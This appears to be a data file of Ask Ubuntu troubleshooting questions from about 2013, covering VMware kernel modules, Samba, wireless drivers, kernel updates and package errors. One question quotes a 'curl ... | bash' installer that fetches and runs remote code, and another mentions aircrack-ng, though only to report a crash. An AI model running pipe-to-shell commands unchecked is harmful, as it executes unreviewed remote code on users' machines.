342476	vmware failed in buildig kernel modules ( ubuntu 13.10 )	i 've tried to install vmware workstation and it requires build modules , but it failed and i have applies patches : cd /tmp curl -o http : //pkgbuild.com/git/aur-mirror.git/plain/vmware-patch/vmblock-9.0.2-5.0.2-3.10.patch curl -o http : //pkgbuild.com/git/aur-mirror.git/plain/vmware-patch/vmnet-9.0.2-5.0.2-3.10.patch cd /usr/lib/vmware/modules/source tar -xvf vmblock.tar tar -xvf vmnet.tar patch -p0 -i /tmp/vmblock-9.0.2-5.0.2-3.10.patch patch -p0 -i /tmp/vmnet-9.0.2-5.0.2-3.10.patch tar -cf vmblock.tar vmblock-only tar -cf vmnet.tar vmnet-only rm -r vmblock-only rm -r vmnet-only vmware-modconfig -- console -- install-all then i got error again ( grep error ) : vmblock-only/linux/file.c:240:4 : error : unknown field âreaddirâ specified in initializer
342477	could not apply stored configuration for monitors , resolution changed both in windows and ubuntu	i was just surfing on the internet when the screen just blacked out and bam , my monitors resolution was done and i am not able to detect my original resolution in both ubuntu and windows ( strange ) i googled it and saw some answers but they are not working for my i tried - deleted monitors.xml file from .config folder looked for xorg.conf file which is not present there in my system i am using a ubuntu 12.04 version
342481	kubuntu 13.04 - run applications minimized at startup	i have ubuntu 13.04 and kde 4.11 . i 'd like to start thunderbird goldendict and calibre at startup but they have to minimized . i have tried kstart but it does n't work well i guess . i have already set them up to run at startup from system administration/startup but at this moment they run at startup in normal mode . how can i do that ? if there is no way to do that from kde settings i could also use a script that will run at startup . thanks
342482	my update manager is not showing the latest version of ubuntu 12.04 ?	i am currently having ubuntu 11.04
342484	/etc/pki/tls/certs/ca-bundle.crt not found	i am using curl -l https : //get.rvm.io | bash -s stable to install rvm . i get an error saying cafile : /etc/pki/tls/certs/ca-bundle.crt capath : none i searched a bit on the internet and found that changing the permissions of /etc/pki/tls/certs/ca-bundle.crt should get the job done . but whole /etc/pki directory is missing from my system . how can i fix it ?
342485	matshita ujda 760 dvd/cdrw not working	i have a panasonic toughbook cf-30 with a matshita ujda 760 dvd/cdrw running ubuntu 12.04 . i have tried everything i can think of to try and resolve this issue but nothing works . the drive shows up in the disk utility and i 'm able to eject the dive from here . however the drive ca n't read anything and wo n't auto play . i 'm running windows 7 paralleled on this machine and the drive works just fine in that . please help me with this problem . i much prefer your operating system over windows and must be able to use this cd drive for work .
342486	every time i try to upgrade kubuntu , dependency issues	alizard @ terrarium : ~ $ sudo apt-get update & & sudo apt-get -f install [ sudo ] password for alizard : [ blog response that i needed at least reputation 10 to post over 2 links in message ] fetched 534 kb in 10s ( 52.6 kb/s ) reading package lists ... done n : ignoring file 'bitcoin-bitcoin-quantal.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'jitsi.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'chrysn-openscad-precise.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.8.0-19 linux-headers-3.8.0-19-generic linux-headers-3.8.0-21 linux-headers-3.8.0-21-generic linux-headers-3.8.0-22 linux-headers-3.8.0-22-generic linux-headers-3.8.0-23 linux-headers-3.8.0-23-generic linux-headers-3.8.0-25 linux-headers-3.8.0-25-generic linux-image-3.8.0-19-generic linux-image-3.8.0-21-generic linux-image-3.8.0-22-generic linux-image-3.8.0-23-generic linux-image-3.8.0-25-generic linux-image-extra-3.8.0-19-generic linux-image-extra-3.8.0-21-generic linux-image-extra-3.8.0-22-generic linux-image-extra-3.8.0-23-generic linux-image-extra-3.8.0-25-generic use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 83 not upgraded . n : ignoring file 'bitcoin-bitcoin-quantal.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'jitsi.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'chrysn-openscad-precise.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'bitcoin-bitcoin-quantal.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'jitsi.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'chrysn-openscad-precise.list-debug ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension
342487	why does my samba shares becomes unnaccesible after a while using them ?	i have a 12.04lts server setup with samba so that i can access my share from windows machine . my problem is that i can sometimes connect to the share and after a short while the share is not accessible , i then try to connect again from a different windows machine , and i get the same problem . after a short while i am again able to access the share and it keep on giving me the same cycle . my samba configuration file is as follows : [ global ] netbios name = psserver server string = workgroup = paradise security = user encrypt passwords = yes smb passwd file = /etc/samba/smbpasswd interfaces = 192.168.0.1/8 [ print $ ] path = /var/lib/samba/printers browseable = yes guest ok = yes read only = yes write list = root create mask = 0664 directory mask = 0775 [ printers ] path = /tmp printable = yes guest ok = no browseable = no [ pachsoft ] comment = pachsoft pos system path = /pachsoft writeable = yes create mode = 0600 directory mode = 0700 i am able to ping the server on ip 192.168.0.100 as well as access it using webmin or putty or ssh secure shell which never drops me from the server so i know it is not a network issue but the samba share always drops intermittent . could there be a problem with samba on ubuntu 12.04 lts ? i have set it up as a headless . the link to samba log http : //paste.ubuntu.com/6075194/ there are only three folders in the samba cores directory , nmbd nothing in , smbd with a file called core which shows elf i do n't know how to copy the contents , winbindd with nothin in problem has been solved after i install virtual box which upgraded my server
342497	mediterranean themes for unity - change input form colors	i 've installed mediterranean themes and i am using the dark one . the problem is that @ wolfram website the input form background color is black but the font is dark grey so it 's difficult for me to use . although @ askubuntu , while the input form of the title has a black background the font color is grey but visible . is there any way to change the color of the font i see in the input form at wolfram or i just have to cope with it ? thank you for your time !
342499	ubuntu 13.04 not working after boot	my ubuntu 13.04 is not working after boot . after i had installed some applications . the graphic used to be better before this happened . my keyboard and my mouse is n't working . i 'm using a desktop ( nec power mate ) hope you can help ! ! i ca n't type anything and ca n't even move my mouse basically i ca n't do anything after i have logged in . my keyboard and mouse works perfectly on other computers .
342501	why sudo gem install fails but gem install succeeds ?	i simply do sudo gem install sqlite3 and have response : sudo : gem : command not found then i do gem install sqlite3 and it works . where is the problem with sudo ?
342503	i am very new to ubuntu ... .could anybody direct me how to learn linux from basics ?	could anybody direct me to learn linux ? what should i do for learn linux ?
342510	good security setup in a lamp environment	i have created a script to automate setting up my lamp environment as well as installing some other software i find very helpful in coding . the script can be found here i only have one user `` root '' setup on my ubuntu server . after installing apache from my script i get a new user called `` www-data '' as well as a group also called `` www-data '' added to the server . i would now like to create a new user called `` webmaster '' that will have less privileges than root ( ie : ca n't install anything and will only be able to render websites that are placed in /home/webmaster/htdocs ) my question is this : should i simply add `` webmaster '' to the group www-data so that my server can render the websites or is this considered a bad idea due to some security issues i might not know about ? in short , is this a secure way of setting up a lamp server ?
342511	changing the grub	i have the following os 's installed . ubuntu 12.04 lts windows 7 ubuntu 13.04 after logging into ubuntu 13.04 , i tried modifying the grub using grub-customizer . it does n't change anything . why is that ?
342520	how to run thunderbird in background and pop notification for new mails	recently installed ubuntu 12.04 , configured thunderbird email client . but seems like the email client is not working in background ( like rhythmbox ) . need to keep running that like other foreground application to get mail notifications . and solution ? need any addon or plugins ?
342532	kubuntu taskbar requires double click to open minimized window	after installing updates this morning , i could not login to kde any more ( `` startkde not found '' ) . i reinstalled kde and solved that problem . however , something has changed , because now i have to double click on the taskbar to maximize/minimize open applications , which is really annoying ! is there a way to go back to normal single click behaviour ? i have googled and checked the system settings , but found nothing that i could logically relate to this problem .
342534	problem compiling driver for usb31000sw usb-ethernet adapter	i 'm trying to build a driver for the startech usb31000sw . a linux driver is included but it has to be compiled and installed . when running make i get the following errors : make -c /lib/modules/3.2.0-52-generic-pae/build subdirs=/home/lars/hämtningar/usbnet/linux/kernel 2.6.x_3.x modules make [ 1 ] : går till katalogen `` /usr/src/linux-headers-3.2.0-52-generic-pae '' make [ 1 ] : *** ingen regel för att skapa målet `` 2.6.x_3.x '' . stannar . make [ 1 ] : lämnar katalogen `` /usr/src/linux-headers-3.2.0-52-generic-pae '' make : *** [ default ] error 2 the third line translates to : no rule to create target according to the read me file , the kernel source is needed , so i installed it from synaptic . this is the makefile : current = $ ( shell uname -r ) target = ax88179_178a objs = ax88179_178a.o mdir = drivers/net/usb kdir = /lib/modules/ $ ( current ) /build sublevel= $ ( shell uname -r | cut -d ' . ' -f 3 | cut -d ' . ' -f 1 | cut -d '- ' -f 1 | cut -d '_ ' -f 1 ) usbnet = $ ( shell find $ ( kdir ) /include/linux/usb/* -name usbnet.h ) ifneq ( , $ ( filter $ ( sublevel ) ,14 15 16 17 18 19 20 21 ) ) mdir = drivers/usb/net # usbnet = $ ( shell find $ ( kdir ) / $ ( mdir ) /* -name usbnet.h ) endif # ifneq ( , $ ( filter $ ( sublevel ) ,21 22 23 24 ) ) # usbnet = $ ( shell find $ ( kdir ) / $ ( mdir ) /* -name usbnet.h ) # endif # $ ( if $ ( usbnet ) , , $ ( error $ ( kdir ) / $ ( mdir ) /usbnet.h not found . please refer to readme file for the detailed description ) ) extra_cflags = -dexport_symtab pwd = $ ( shell pwd ) dest = /lib/modules/ $ ( current ) /kernel/ $ ( mdir ) obj-m : = $ ( target ) .o default : make -c $ ( kdir ) subdirs= $ ( pwd ) modules $ ( target ) .o : $ ( objs ) $ ( ld ) $ ( ld_rflag ) -r -o $ @ $ ( objs ) pw install : su -c `` cp -v $ ( target ) .ko $ ( dest ) & & /sbin/depmod -a '' clean : $ ( make ) -c $ ( kdir ) subdirs= $ ( pwd ) clean .phony : modules clean -include $ ( kdir ) /rules.make any ideas would be welcome
342535	reinstall windows 8 in a dual boot setup ?	i am currently using lubuntu in tandem with windows 8 in a dual boot setup . windows 8 is getting sluggish , so i want to do a clean install of it . in addition , i want to go from lubuntu to xubuntu ( my laptop is more powerful than i thought ) . how can i uninstall lubuntu and reinstall windows 8 , then install xubuntu ? important information : no recovery disk , so i have to use the built-in option no cd drive , so i have to use a usb i know how to install xubuntu , so i really need to know how to get rid of lubuntu and reinstall windows 8 thanks for your help .
342540	boot-up manager seems like does n't work	i installed boot-up manager , unchecked all services i do n't want to load , but nonetheless they autostart each time and i have to stop them manually : alex @ lenovo : ~ $ sudo service mysql stop mysql stop/waiting alex @ lenovo : ~ $ sudo service postgresql stop * stopping postgresql 9.2 database server [ ok ] alex @ lenovo : ~ $ sudo service mongodb stop mongodb stop/waiting what 's up with that ?
342542	how to make a liveusb that keeps programs installed ?	i want to make a liveusb ( what works fine ) . but is there a possibility to install programs in it ?
342543	how can i remove proprietary sources	i only enabled `` main '' and `` universe '' repos , but still proprietary software like `` steam '' are enabled and shown in the list , how can i remove them ?
342551	i am unable to locate wine in raring	i have added repo , added sources , restarted , reinstalled ubuntu . i have entered just about every useful command in the book , but when i type apt-get install wine , i still get the message saying wine is unavailable , but is referred to by another packages , no installation candidate . i do n't understand , what do i need to do ?
342552	vmware-vix vmrun command error : `` unable to connect to host ... version not found ''	vmware-vix command `` vmrun '' failing i have checked in the online resources of the product documentation , and in discussion groups where other people experience the same issue . i have the following configuration ubuntu 13.04 ( x64 ) vmware player 6.0 vmware-vix api 1.12.2 ... and when i try to run the command in the format : vmrun -t player start /path/vm.vmx i get an error : *unable to connect to host . error : the specified version was not found . * forum proposed solution : others with the same issue claimed the solution was to edit a file /usr/lib/vmware/configurator/vixwrapper-product-config.txt to add / modify the line ( to ensure it has your correct version of vm player ) player 16 vmdb 6.0.0 workstation-10.0.0-and-vsphere-5.5.0 ... but when i open the player , it seems that i do already have v6.0.0 ( according to the `` help > about '' menu item in the player gui . ... so if it is not the wrong version in that config file ... what is causing the problem ? update when i try to run the command instead as just : $ vmrun start /path/vm.vmx ( without the -t and `` player '' host type specification ) ... i get the error : service type vix_serviceprovider_vmware_workstation was specified , but not installed so is this indication that it thinks i have installed workstation instead of player ? how can i change that ?
342553	activate acl for zfs pool ubuntu 13.04	i have tested acl on local folders and i works perfect . but on my zfs pool called `` tank '' root @ datacenter : /mnt # ls datatank test webmin_1.650_all.deb root @ datacenter : /mnt # setfacl -m u : casper : rwx datatank setfacl : datatank : operation not supported how can i add acl support for my zfs system ? whats wrong ?
342555	`` e : unable to locate package eclipse '' in ubuntu 12.04.2 for `` sudo apt-get install eclipse ''	after doing `` sudo apt-get update '' which executed successfully , i tried to install eclipse using `` sudo apt-get install eclipse '' . but it is showing `` e : unable to locate package eclipse '' . output for `` lsb_release -a ; apt-cache policy eclipse-platform '' is no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise n : unable to locate package eclipse-platform please help me ... thanks in advance
342557	new kernel gives purple screen after update in ubuntu 12.10	i have a somewhat serious problem . ( i am in ubuntu 12.10 ) yesterday , i clicked on the update manager to see if there were any updates . there were about 26 , and when i investigated , i saw that they were for a kernel update . the new kernel was 3.5.0-40 . ( my old working kernel is 3.5.0-39 ) so i said , sure , i 'll update my kernel . after i rebooted , i was stuck on a purple screen , so i pushed the power button and turned off my computer . after a bit of research , i realized the old kernel might work still . so i booted into it , and it worked like a charm . then , i downloaded a program called grub customizer , ( you can probably google it ) , and then changed my default boot entry to the old kernel . now i do n't have to go to the grub2 boot menu whenever i boot up , which is nice . however , i do n't like it saying `` mounting ramdisk '' whenever i boot up because i use the old kernel , but i can stay on that if there 's no fix . so here are my questions : 1 . ) is the new kernel not working because of a graphics driver problem ? i have a intel sandy bridge mobile graphics card , which works like a charm . ( with the old kernel ) 2 . ) is it safe to delete the new kernel ? i can not afford to screw up my computer ! i have found lots of information about deleting old kernels , but not new ones . 3 . ) if i do delete my new kernel , do i need to change the settings in grub customizer again ? if so , to what ? thanks for your help , and if there is no way to fix this , i am o.k . to stay on the old kernel . thanks for your help/time .
342558	ubuntu video lens	i am using ubuntu 12.04.i have a problem about unity video lens.when i use filter ; for an example youtube and just searched about fast and furious , it appears very different search results than the search results from youtube site for the same topic.i want to appear the same result on video lens , that appears in youtube site.i checked this for other sites like daily motion and i found the same problem . also , when i searched without a filter , i appears very unrealted or least related ones.mostly indian videos . please help me in this problem . thank you .
342563	need help figuring out if adding an ldap server to my ubuntu box that 's primarily ( read : exclusively ) used as a plex/media server is appropriate	update : this has turned into a discussion on caldav/carddav installations , namely a server called calidav -- i currently have a box running the following : ubuntu 12.04 pentium d 2.8ghz w/ 2 cores 4gb ddr2 memory ( 2 ) 2tb hard drives i use this exclusively as a plex media server and it 's been absolutely flawless while functioning as this . however i have decided that i need to get my contacts under control . prior to them shutting down i had used a service called sync2em to organize my contacts . they provided an exchange server and i could update my contacts real-time with any of my devices and my desktop client . alas they turned off their service and my contacts have turned into a big mess . i have various contacts on my ipad , iphone , windows 7 box , and a couple web email providers . it 's really become quite annoying and hampering my ability to get stuff done always having to dig around to find an email or a phone number . i 've decided enough is enough . my goal is to consolidate all of my contacts into one central server that i can use for not only emails , but address book , birthday , notes ( for the contact ) , etc . i do -not- want to use google , apple , or any of those companies to hold this data because -- well -- does this really require an explanation ? i want to do this locally on my own server . here 's my questions : is an ldap server appropriate for this ? if so what kind of applications would i install ? is this difficult to do ? will this ldap server conflict with this machines plex server functions ? if not , what kind of resources will it take up as basically just used for a address book ? will i be able to update the ldap server from all my devices provided i use a desktop client ? the webmail provider i use is yandex.com . the way they handle contacts is absolutely horrendous . can you think of any other type of way to accomplish this that may be a better solution than an ldap server ? thanks for your help .
342565	slow and laggy scrolling in firefox with fglrx installed	i have ubuntu 13.04 and kde 4.11.1 my problem is that firefox scrolling is slow and laggy . i 'll give you some more information : firefox 23.0 my video card is an ati hd6870 and i have the fglrx drivers 13.4 installed it 's not related to flash because it happens even on web pages where there is not flash it 's not related to ads because i use plugins to block ads it also happens with unity so it 's not a desktop environment related problem it 's not about the number of addons i have installed because i have done a fresh firefox installation and it happens the same and i have the same number of addons on firefox on windows and it works better on windows i have tried both these addons for smooth scrolling https : //addons.mozilla.org/it/firefox/addon/yet-another-smooth-scrolling/ and https : //addons.mozilla.org/it/firefox/addon/smoothwheel/ and the scrolling is worse with them i have activated `` no tearing desktop '' in catalyst control center because i need it when playing mkv movies and `` catalyst a.i '' i have also installed chromium and it 's much smoother and faster and i have no scrolling problems with it so i also have a notebook with ubuntu 13.04 , kde and same firefox version with same addons , it has a nvidia video card and scrolling is much smoother and faster in firefox rather than on my computer with the ati video card any advice to solve it ? thanks
342573	manually synchronize a webdav share with a local folder	i am running ubuntu 13.04 . i want to manually synchronize a local folder with a webdavs share . i can type control-l in nautilus ( files ) , type in the davs : //user @ myserver.com : port/ and mount the folder without any difficulty . i am not getting the syncing part .
342577	best version for dell mini 1210	i went from ubuntu version 8 something to 13.04 and the system is slow to the point of unuseable . is there something i can do with 13.04 to make it work or should i install an earlier version ? if so what version ? thank you , hap
342579	aircrack-ng kernel panic	when i try to run the aircrack-ng suite by starting off with airmon-ng start wlan0 , the whole os crashes and i get a kernel panic error and i have to actually turn the pc off then back on for it to work again . i 'm using ubuntu 13.04. do you think that it 's compatibility issues with the latest ubuntu ? i also have a broadcom card so i thought it might have been that , but i used an external wifi adapter with a different driver of course and it still does it . do you think if i compile aircrack-ng from source that it would work ? i could see it working if it was compatibility issues . any help would be awesome ! my output : lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 12:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0c45:6480 microdia sonix 1.3 mp laptop integrated webcam bus 002 device 028 : id 046d : c05a logitech , inc. optical mouse m90 bus 002 device 029 : id 04e8:681c samsung electronics co. , ltd galaxy portal/spica/s bus 002 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 002 device 004 : id 413c:8161 dell computer corp . integrated keyboard bus 002 device 005 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] bus 002 device 025 : id 413c:8160 dell computer corp. wireless 365 bluetooth uname -a linux x-laptop 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:54:42 utc 2013 i686 i686 i686 gnu/linux lsmod module size used by usb_storage 47684 0 cdc_acm 22338 0 michael_mic 12540 8 arc4 12543 4 parport_pc 27504 0 ppdev 12817 0 rfcomm 37420 12 bnep 17669 2 binfmt_misc 17260 1 dm_crypt 22321 0 btusb 17986 0 bluetooth 202109 22 bnep , btusb , rfcomm joydev 17097 0 ip6t_reject 12533 1 uvcvideo 71279 0 xt_hl 12465 6 videobuf2_vmalloc 12920 1 uvcvideo ip6t_rt 12473 3 videobuf2_memops 13042 1 videobuf2_vmalloc videobuf2_core 39161 1 uvcvideo nf_conntrack_ipv6 13871 7 nf_defrag_ipv6 13025 1 nf_conntrack_ipv6 videodev 95806 2 uvcvideo , videobuf2_core ipt_reject 12485 1 xt_log 17192 8 xt_limit 12541 11 xt_tcpudp 12531 26 xt_addrtype 12563 4 ipt_masquerade 12663 1 iptable_nat 12706 1 nf_nat_ipv4 13095 1 iptable_nat nf_conntrack_ipv4 14071 8 nf_defrag_ipv4 12649 1 nf_conntrack_ipv4 xt_state 12514 14 ip6table_filter 12711 1 ip6_tables 17819 1 ip6table_filter nf_conntrack_netbios_ns 12585 0 nf_conntrack_broadcast 12541 1 nf_conntrack_netbios_ns nf_nat_ftp 12548 0 nf_nat 20857 4 nf_nat_ftp , ipt_masquerade , nf_nat_ipv4 , iptable_nat nf_conntrack_ftp 13118 1 nf_nat_ftp nf_conntrack 67003 11 nf_nat_ftp , nf_conntrack_netbios_ns , ipt_masquerade , nf_nat , xt_state , nf_nat_ipv4 , nf_conntrack_broadcast , nf_conntrack_ftp , iptable_nat , nf_conntrack_ipv4 , nf_conntrack_ipv6 iptable_filter 12706 1 ip_tables 17791 2 iptable_filter , iptable_nat x_tables 21974 14 ip6table_filter , xt_hl , ip_tables , xt_tcpudp , ipt_masquerade , xt_limit , xt_state , xt_log , iptable_filter , ip6t_rt , ipt_reject , ip6_tables , xt_addrtype , ip6t_reject coretemp 13131 0 snd_hda_codec_hdmi 36186 1 snd_hda_codec_idt 63896 1 snd_hda_intel 38307 5 lib80211_crypt_tkip 17160 0 snd_hda_codec 117617 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 80890 4 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 14230 2 snd_pcm , snd_hda_intel snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25114 1 snd_seq_midi snd_seq 51280 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 24411 2 snd_pcm , snd_seq wl 2902185 0 lib80211 14040 2 wl , lib80211_crypt_tkip snd 56485 19 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device mac_hid 13037 0 dell_wmi 12601 0 dell_laptop 17161 0 sparse_keymap 13658 1 dell_wmi lpc_ich 16925 0 psmouse 81065 0 cfg80211 436177 1 wl dcdbas 14021 1 dell_laptop mei 36197 0 intel_ips 17666 0 serio_raw 13031 0 soundcore 12600 1 snd lp 13299 0 parport 40753 3 lp , ppdev , parport_pc microcode 18286 0 hid_generic 12484 0 usbhid 41805 0 hid 82666 2 hid_generic , usbhid wmi 18590 1 dell_wmi i915 535505 3 i2c_algo_bit 13197 1 i915 video 18894 1 i915 drm_kms_helper 47545 1 i915 drm 228489 4 i915 , drm_kms_helper r8169 61543 0 ahci 25507 1 libahci 26108 1 ahci
342586	how to install citrix receiver ?	how can i install citrix receiver on ubuntu 13.04 ?
342594	i removed gnome-screensaver	i removed gnome-screensaver to install xscreensaver , but for some reason , it failed to run gnome-shell . i ran it manually but it failed . i also do sudo dpkg but no work . before that , i installed kingsoft-office but when i install it , it took too much time to respond so i cancelled it and shutdown the computer by unplug the power cable . but , i went to the recovery mode , turn on the network , and ran sudo apt-get install gnome-screensaver , it says the package kingsoft-office needs to be reinstalled , but i ca n't find an archive for it . i also ran software-center but it crashed .
342596	add custom button with gtk or qt on ubuntu login screen	i 'm currently working on custom ubuntu distro for local use only . i need to create a custom button on ubuntu login screen . i do n't know where to start , how to edit ubuntu login screen ? the button , for starter , will just do basic thing like prompt a hello world dialog window . please state what i should use , qt or gtk or any possible solutions to this problem , i 'm stuck here : p thanks..
342599	ubiquity wants to force en language during installation	i 'm struggling with ubiquity for a customized live-cd based on ubuntu and xfce . here 's the thing : i removed all languages except fr ( french ) from the iso , everything works perfectly if i make an offline installation . everything is in french , the post-install language tool only shows me the fr languages ( french and canadian ) , without any extra packages to download . but things are getting wierd when i install with a internet connection , ubiquity wants to install en packages , even if i decided to make a french installation . and of course , he wants to download ~150mo of packages . i looked up in /usr/lib/ubiquity/localechooser/* and usr/share/ubiquity/localechooser-apply , but i ca n't see where does ubiquity choose to add en to my languages . does anyone have an idea to prevent ubiquity to download and install en languages in addition of selected language ? i could of course let the en packages on the iso , but in my opinion , it 's a waste of space , since i do n't need them . thank you !
342600	how can i enable hardware acceleration for flash on intel graphics ?	is there any way to improve the adobe flash player hardware acceleration in ubuntu , with an intel graphics card ?
342607	why does /usr/bin/mail ignore aliases in $ home/.mailrc	when i send email using /usr/bin/mail on the command line ( ubuntu 13.04 64-bit ) , it does not pay attention to any aliases in my .mailrc file . does anybody know how to fix this ? to reproduce the problem : put an alias in $ home/.mailrc alias foo me @ whatever.com try to mail the alias : $ echo hello | /usr/bin/mail -s testing foo read /var/log/mail.log and see `` foo '' bounce as an unknown user : sep 7 11:15:39 mycomputer postfix/local [ 9707 ] : ee038f6028b : to= < foo @ mycomputer.mydomain > , relay=local , delay=0.1 , delays=0.07/0/0/0.03 , dsn=5.1.1 , status=bounced ( unknown user : `` foo '' ) however , my other mail programs , such as emacs vm , respect the aliases in $ home/.mailrc . this did n't used to happen in ubuntu 10.04 lts , my previous system . on further investigation ... i ran : $ mail -f mymailbox ? alias foo foo me @ whatever.com so /usr/bin/mail is indeed processing $ home/.mailrc , but somehow , even though `` mail '' knows the alias `` foo '' , the result is that postfix sees an email message to `` foo @ mycomputer.mydomain '' instead of the alias expansion . i do n't know who 's misconfigured : mail ( gnu mailutils ) or postfix .
342614	how to overcome burn problems or buy installation disk ?	i have tried and tried to download and burn ubuntu 13.04 without success . the first time took 18 hours . where and from whom can i purchase a installation disc in atlanta , georgia .
342615	ubuntu touch : screen color tone	i have just installed ubuntu touch on a samsung galaxy nexus phone ( supposedly an unused one ) . the problem is : the middle part of the screen displays a color tone that 's more yellowish than the parts where the ( previous ) black android bars were displayed ( at the top and at the bottom of the screen ) before my ubuntu touch installation . could it be that there is some sort of android interference on the technical level ( see https : //wiki.ubuntu.com/touch/faq # how_is_ubuntu_touch_connected_to_android.3f ) that causes this or does it mean that the device is not unused and that android was indeed used on it long enough for the middle part of the screen to become more yellowish than the surface of the top and bottom bars where the screen would remain `` more unused '' ( and therefor less yellowish ) because the bars were black ? you can even see android 's arrow pointing up , at the center , in the 1st pic :
342616	need help fixing wireless in ubuntu 12.04 , i 've tried everything !	so , i 'm a complete noob when it comes to ubuntu . i have tried everything that everyone has told me to do but nothing works . i 'm running ubuntu 12.04 and i just need instructions right from the beginning . please help . lspci -nnk | grep -ia2 net 00:0a.0 ethernet controller [ 0200 ] : nvidia corporation mcp79 ethernet [ 10de:0ab0 ] ( rev b1 ) subsystem : dell device [ 1028:0271 ] kernel driver in use : forcedeth -- 06:00.0 network controller [ 0280 ] : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 ) subsystem : dell wireless 1510 wireless-n wlan mini-card [ 1028:000d ] kernel driver in use : b43-pci-bridge
342620	stop uploading to internet in ubuntu	i am using ubuntu 12.04 i want to disable uploading files to internet ( dropbox or email or any website ) from my machine is there any way to applied this in ubuntu ?
342621	ca n't install ubuntu inside windows 8 , facing a lot of problems	first of all my wubi.exe wo n't start up . i 've tried everything but ca n't get it to work . secondly , i have 3 partitions on my drive . since the wubi.exe did n't work . i burned my iso file to a disk . i downloaded the amd64 version of ubuntu 13.04 as my laptop has a windows 8 logo on the start button . anyhow , when i boot from the cd i get a couple of options like try ubuntu without installing , install ubuntu , intall oem version '' blah blah when i select install ubuntu the ubuntu installed loads up with the orange like reddish shade . so i select my language , click next and get to a page where it says install ubuntu inside windows 8 , replace windows 8 and on the bottom something else . if i select install ubuntu inside windows 8 , my screen goes black and cd drive ejects ( wtf ? ) . and nothing else happens . i tried with something else , but that place is pretty complicated too . i did n't experiment with it because i ca n't screw up my harddrive and windows cause i 've got important stuff in there . what do i do ? : (
342623	i need help updating ubuntu 11.04 ... so many problems	this computer was originally windows vista , but boot manager went missing and could n't boot up . a friend of mine gave me a compact disk with linux 11.04 , and replaced vista . however , i am unable to login in any way other than in safe mode , or classic : no effects . i realize you can go into update manager and update it from there , but i need to download it from the ubuntu software center , which freezes upon launch . there was one time where i was able to search something in the software center , and turns out i have no sources to download anything . 700 some packages are broken , that may be a good connection , but i 'll do the repair process and it 'll say it fixed everything , when it did virtually nothing . i downloaded the .iso for the newer ubuntu , and made a bootable flashdrive , and using f12 to boot from the memory stick , it would start to work . whatever option i chose from there ( run ubuntu from usb , install ubuntu on a hard disk , etc ) it would blast through some terminal stuff , then stop at when it says : , locks=none or under that it stops at [ 0.288973 ] pnpbios : pnp bios version 1.0 , entry 0xf0000:0x9afd , dseg 0x400 